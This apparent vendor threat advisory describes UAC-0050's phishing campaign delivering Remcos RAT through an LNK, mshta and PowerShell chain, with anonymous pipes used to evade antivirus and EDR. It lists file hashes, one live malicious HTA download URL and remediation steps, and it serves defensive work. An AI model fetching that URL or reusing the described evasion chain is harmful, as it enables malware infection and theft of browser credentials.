Rewterz Threat Advisory – CVE-2023-44807 – D-Link DIR-820L Vulnerability
January 4, 2024Rewterz Threat Alert – Amadey Botnet – Active IOCs
January 4, 2024Rewterz Threat Advisory – CVE-2023-44807 – D-Link DIR-820L Vulnerability
January 4, 2024Rewterz Threat Alert – Amadey Botnet – Active IOCs
January 4, 2024Severity
High
Analysis Summary
A threat group called UAC-0050 has been discovered using phishing attacks to propagate Remcos RAT using novel strategies for detection evasion from antivirus software. In their latest campaign, the group uses a pipe method for interprocess communication, showing their sophistication.
Remcos RAT is a notorious malware that is used for remote access and control and has been used widely by threat actors for espionage activities. UAC-0050 has been active since 2020 and is known for targeting Polish and Ukrainian organizations using social engineering campaigns by posing as legitimate organizations to trick users into opening malicious attachments.
In February 2023, the adversary was linked to a phishing campaign distributing Remcos RAT. Since the last few months, the same trojan has been spread as part of at least three different phishing campaigns, one of which led to the deployment of an information stealer called Meduza Stealer. The latest analysis by security researchers is based on a Windows shortcut file (LNK) which was discovered on December 21, 2023. The initial access vector is currently unknown, but it is believed to have been through phishing emails that targeted Ukrainian military personnel with document lures claiming to advertise consultancy roles with the Israel Defense Forces (IDF).
The LNK file is responsible for harvesting information regarding the antivirus software installed on the target system, and then it executes an HTML application called “6.hta” from a remote server using mshta.exe, which is a Windows-native binary for executing HTA files. This way, a PowerShell script is executed which then runs another PowerShell script to download two files named “ofer.docx” and “word_update.exe” from an actor-controlled domain.
When “word_update.exe” is executed, it creates a copy of itself with the name “fmTask_dbg.exe” intending to establish persistence by creating a shortcut to the new executable in the Windows Startup folder. The binary also employs pipes that aren’t named to carry out the exchange of data between itself and a newly spawned child process for cmd.exe that can finally decrypt and launch the latest version of Remcos RAT which can collect system data, cookies, and login information from web browsers like Mozilla Firefox, Internet Explorer, and Google Chrome.
By using pipes within the Windows operating system, a covert channel for transferring data is provided which helps in detection evasion from Endpoint Detection and Response (EDR) and antivirus systems. This technique isn’t completely new but it serves as a big leap in sophistication of the threat group’s strategies.
Impact
- Sensitive Information Theft
- Cyber Espionage
Indicators of Compromise
MD5
- 56154fedaa70a3e58b7262b7c344d30a
- 9b777d69b018701ec5ad19ae3f06553f
- 7c05cfed156f152139a6b1f0d48b5cc1
- 7f87d36c989a11edf0de9af392891d89
- f5ee6aa31c950dfe55972e50e02201d3
- 5c734bb1e41fab9c7b2dabd06e27bc7b
- 8158b43f745e0e7a519458b0150e1b61
- f71ef85824f906856cb3d2205058bdd2
- 8bebea01d914a3c3a2d876417f7d1d54
- b1f8484ee01a7730938210ea6e851888
SHA-256
- f650a9f1930e55e405d7121c56b90a996ab213a05b772a8f02ceb1cdbeb91165
- 8963e1c87200d0b900f558c1968428dc3a1f05748ddeff0150297aa33d14ff88
- e4615b74d62f384d23e58bc467c615b17779e4f8084c8a0134db97a5e642027f
- c5452b859922b9633839e092f09f0ce4818b6085043360c90c0b0f2bfad9fca1
- 5fff1cd29bb6e6cfe9516b70f9f44755098392c2e2a0f4784486182c309b2c99
- bd871a2ccd6d7c4f89f9f5087e60cfdcc7ab35b670cfda7ddfd6dbbab8c8560c
- 378c219332e74786b5ce562d15a99fe021e47f1480be09b779db78ae87da9c26
- 3b78e6564c4774a6d3cd88c62e56c6705c2428e53cacb3a95713b8c399a7d7ad
- ab310316f34881a67c6df912e646203adc676d1f53a5bf43873014dfdb0d68cf
- 88f0722c907100ef09049c82032a0ac66afa153d03fb89d378ae65f6e5890a3f
SHA-1
- 31ba4f7a41dda57b4d10ebbc020db9c17012f17c
- f2d8bce46e8df36013b89e4de8bca66e3cf0de3e
- a9bc862f7143a3e34ba420d624f81a9efd1516fc
- e644bc7774cfd1beecea50fb47b8ffd32b092c30
- 502bbd516526e579b2b0d0a5aaef0a66659e7fbb
- 1bee4d678beb8928377fbc112eade1af5ec30295
- 09f678acd0ecb99e22e069661edf4fda8457e496
- f20d2dcdd6303ed23bfe9dcffe3736a6de660a74
- 5089adac80acd2d36ad9cb1cce0e4a544474269e
- 4ab9c910cfc9690b7f54eba83e30bc1fe6984297
URL
- http://new-tech-savvy.com/algo.hta
Remediation
- Block all threat indicators at your respective controls.
- Search for Indicators of compromise (IOCs) in your environment utilizing your respective security controls.
- Never trust or open links and attachments received from unknown sources/senders.
- Passwords – Ensure that general security policies are employed including implementing strong passwords, correct configurations, and proper administration security policies.
- Admin Access – limit access to administrative accounts and portals to only relevant personnel and make sure they are not publicly accessible.
- Patch and upgrade any platforms and software timely and make it into a standard security policy. Prioritize patching known exploited vulnerabilities and zero-days.
- Enable antivirus and anti-malware software and update signature definitions on time. Using multi-layered protection is necessary to secure vulnerable assets.